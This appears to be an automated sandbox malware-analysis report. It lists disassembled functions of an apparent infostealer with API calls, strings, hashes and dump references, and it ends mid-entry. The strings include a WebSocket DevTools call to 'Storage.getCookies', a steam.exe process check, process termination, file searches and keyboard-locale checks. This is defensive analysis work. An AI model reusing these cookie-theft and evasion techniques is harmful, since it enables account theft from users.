                              • Instruction ID: f4c6d1b4ffb2231f29039fe58b362347b6297fd6e2e417c7d9d110799c70d023
                              • Opcode Fuzzy Hash: 0f280d82f11f32d44a9c480b6b1e0195ff1d6ba91776f23dc1222a36fdf11dd3
                              • Instruction Fuzzy Hash: C7B217F360C2049FE7046E2DEC8567AFBE9EF94720F16492DEAC4C3744EA3558058697
                              Function 007D48B0 Relevance: 16.1, APIs: 4, Strings: 6, Instructions: 1129COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Xinvalid_argumentstd::_
                              • String ID: Connection: UpgradeUpgrade: websocketSec-WebSocket-Key: $Sec-WebSocket-Version: 13$ HTTP/1.1Host: $:$ws://${"id":1,"method":"Storage.getCookies"}
                              • API String ID: 909987262-758292691
                              • Opcode ID: 0dbfca882645bb78541265db9ae2ddc6cbb38d8e076b56dedb542440d0dcb262
                              • Instruction ID: 56e8272aeb369867e28a44220098e878082ee4cf9d7190a59a558f8b92d2d615
                              • Opcode Fuzzy Hash: 0dbfca882645bb78541265db9ae2ddc6cbb38d8e076b56dedb542440d0dcb262
                              • Instruction Fuzzy Hash: 3CA24871D01269DFDB20DFA8C8807EDBBB6AF48300F1481AAE519A7341DB795E85CF91
                              Function 007C23A9 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 106stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C23D4
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C23F7
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C2402
                              • lstrlen.KERNEL32(\*.*), ref: 007C240D
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C242A
                              • lstrcat.KERNEL32(00000000,\*.*), ref: 007C2436
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C246A
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 007C2486
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                              • String ID: \*.*
                              • API String ID: 2567437900-1173974218
                              • Opcode ID: f7b7add9dff485f430d001cd1f0139c68f06146691ba53d3295e5148b1fa3223
                              • Instruction ID: 296ba05c17f4f0455e89416ad9d1b14ca0fddc809c6b52cbbf1c726e33983299
                              • Opcode Fuzzy Hash: f7b7add9dff485f430d001cd1f0139c68f06146691ba53d3295e5148b1fa3223
                              • Instruction Fuzzy Hash: 55413031526655CBCB32EF68DD89BDE77B5AF54701F009128BC4ABB253CB389D428B90
                              Function 00B62A4B Relevance: 15.4, Strings: 11, Instructions: 1658COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: '`{O$:-$CjzY$P^'$\>w{$f{o$psu{$us3$wPo~$>~?$]wJ
                              • API String ID: 0-993713886
                              • Opcode ID: cbe931d34a79558e21c24485a6bc0881d47cdaaf1a7ea1d9994968f6cc0ca9e6
                              • Instruction ID: 8296e22aff6a064c1098a87180956e664c3495dbed5ea5b7e7f27873b5f979cc
                              • Opcode Fuzzy Hash: cbe931d34a79558e21c24485a6bc0881d47cdaaf1a7ea1d9994968f6cc0ca9e6
                              • Instruction Fuzzy Hash: 9DB208F360C2049FE304AE6DDC8567AFBE9EF94720F16893DE6C4D3744EA3558018696
                              Function 00B695F9 Relevance: 14.1, Strings: 10, Instructions: 1637COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: y^G$""rp$+>-B$F6g$yE$n$yWZ$^hG$h\ $r{$.
                              • API String ID: 0-4134388243
                              • Opcode ID: 586e98466fe42eabbbf4daa15718f5212bb2dc5008293bd51449b0ed30083848
                              • Instruction ID: f384f505df2c586c2a8f3e89e92c950789d4b26707ba79f74370bd4e5a32c7f0
                              • Opcode Fuzzy Hash: 586e98466fe42eabbbf4daa15718f5212bb2dc5008293bd51449b0ed30083848
                              • Instruction Fuzzy Hash: 9DB2E7F360C204AFE3046E2DEC85A7AFBE9EF94720F1A453DE6C4C7744E67598018696
                              Function 007D46A0 Relevance: 13.6, APIs: 9, Instructions: 54processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 007D46B9
                              • Process32First.KERNEL32(00000000,00000128), ref: 007D46C9
                              • Process32Next.KERNEL32(00000000,00000128), ref: 007D46DB
                              • StrCmpCA.SHLWAPI(?,?), ref: 007D46ED
                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007D4702
                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 007D4711
                              • CloseHandle.KERNEL32(00000000), ref: 007D4718
                              • Process32Next.KERNEL32(00000000,00000128), ref: 007D4726
                              • CloseHandle.KERNEL32(00000000), ref: 007D4731
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$CloseHandleNextProcess$CreateFirstOpenSnapshotTerminateToolhelp32
                              • String ID:
                              • API String ID: 3836391474-0
                              • Opcode ID: 688c055346690c1b6af613fc1efa96d331a980028181feec077b34c50bb7e005
                              • Instruction ID: 68f07a121ebb8af4b691f3a4ed954357f1f01370283ed0cdf3fe058e46237bbf
                              • Opcode Fuzzy Hash: 688c055346690c1b6af613fc1efa96d331a980028181feec077b34c50bb7e005
                              • Instruction Fuzzy Hash: 5D01A1315251546BE7209B60DCCCFFB377CAB45B12F000099F909A9180EF749D40AAA0
                              Function 007D4610 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 45processCOMMON
                              Download Yara Rule
                              APIs
                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000), ref: 007D4628
                              • Process32First.KERNEL32(00000000,00000128), ref: 007D4638
                              • Process32Next.KERNEL32(00000000,00000128), ref: 007D464A
                              • StrCmpCA.SHLWAPI(?,steam.exe), ref: 007D4660
                              • Process32Next.KERNEL32(00000000,00000128), ref: 007D4672
                              • CloseHandle.KERNEL32(00000000), ref: 007D467D
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Process32$Next$CloseCreateFirstHandleSnapshotToolhelp32
                              • String ID: steam.exe
                              • API String ID: 2284531361-2826358650
                              • Opcode ID: ac2e0ca0b46b70043fd2a8abbe91e93149ccdb066d6a7b5bf863c2b5cfdc3c68
                              • Instruction ID: 2df4fa9a53d78ef87b61485308cfa8710c8cba11cfb4a7b1cdf84b2ded69f55a
                              • Opcode Fuzzy Hash: ac2e0ca0b46b70043fd2a8abbe91e93149ccdb066d6a7b5bf863c2b5cfdc3c68
                              • Instruction Fuzzy Hash: 8F018B71615128ABD720EB60EC88FEA77BCEB09351F0401D6F949E5180EB78CE949AE1
                              Function 007C4B29 Relevance: 12.1, APIs: 8, Instructions: 102stringfileCOMMON
                              Download Yara Rule
                              APIs
                              • lstrcpy.KERNEL32(00000000,007DCFEC), ref: 007C4B51
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C4B74
                              • lstrcat.KERNEL32(00000000,00000000), ref: 007C4B7F
                              • lstrlen.KERNEL32(007E4CA8), ref: 007C4B8A
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C4BA7
                              • lstrcat.KERNEL32(00000000,007E4CA8), ref: 007C4BB3
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 007C4BDE
                              • FindFirstFileA.KERNEL32(00000000,?), ref: 007C4BFA
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$lstrcat$FileFindFirstlstrlen
                              • String ID:
                              • API String ID: 2567437900-0
                              • Opcode ID: 4f28e24a5ad36fd74a949afd4fe7707ff4188f6121910b87f54e2982f0a42213
                              • Instruction ID: c791978611335b106ec78719f997b05c934a6a622b8c0ff4c5bd74c371eecd00
                              • Opcode Fuzzy Hash: 4f28e24a5ad36fd74a949afd4fe7707ff4188f6121910b87f54e2982f0a42213
                              • Instruction Fuzzy Hash: A0310C71526555DBCB22EF68ED89FDE77B9AF50710F004128BC16BB252CB38EC028B90
                              Function 007D2D60 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 235memoryCOMMON
                              Download Yara Rule
                              APIs
                                • Part of subcall function 007D71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 007D71FE
                              • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 007D2D9B
                              • LocalAlloc.KERNEL32(00000040,00000000), ref: 007D2DAD
                              • GetKeyboardLayoutList.USER32(00000000,00000000), ref: 007D2DBA
                              • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 007D2DEC
                              • LocalFree.KERNEL32(00000000), ref: 007D2FCA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                              • String ID: /
                              • API String ID: 3090951853-4001269591
                              • Opcode ID: 8c9b97b2a21a38113d520c4beed29c6a285969aeba3a13dd84b13f674a788dda
                              • Instruction ID: 729ec2f8dba4f1aaf01ed4618b975ff7933a1fa8d8d3971ac783dc82418cd4e5
                              • Opcode Fuzzy Hash: 8c9b97b2a21a38113d520c4beed29c6a285969aeba3a13dd84b13f674a788dda
                              • Instruction Fuzzy Hash: 1DB1E671904205CFC715CF18C988B99B7F1BB54325F29C5AAD409AB3A2D77A9D83CF90
                              Function 00B6B0DE Relevance: 10.4, Strings: 7, Instructions: 1623COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID: ?wv$ARz_$Yok~$Y<$[v~$i@^$rog
                              • API String ID: 0-2916331397
                              • Opcode ID: 85531d9129a539727492472d321c4fb59d355646c65012c5cbd60b00c836285b
                              • Instruction ID: 054bbf2ac358445262fcf309de67421ecf5fcd9e5315d2295b4a820392125afa
                              • Opcode Fuzzy Hash: 85531d9129a539727492472d321c4fb59d355646c65012c5cbd60b00c836285b
                              • Instruction Fuzzy Hash: 8DB214F360C2049FE308AE2DEC8567AFBE9EF94720F16493DE6C587744EA3558018697
                              Function 00B70289 Relevance: 9.1, Strings: 6, Instructions: 1611COMMON
                              Download Yara Rule
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2156415774.00000000009FC000.00000040.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                              • Associated: 00000000.00000002.2156194942.00000000007B0000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000007E7000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000083E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.0000000000846000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.000000000085F000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156214368.00000000009E8000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156400973.00000000009FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000B81000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C65000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000C95000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156415774.0000000000CA4000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156665832.0000000000CA5000.00000080.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156771571.0000000000E46000.00000040.00000001.01000000.00000003.sdmpDownload File
                              • Associated: 00000000.00000002.2156792788.0000000000E47000.00000080.00000001.01000000.00000003.sdmpDownload File
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_7b0000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
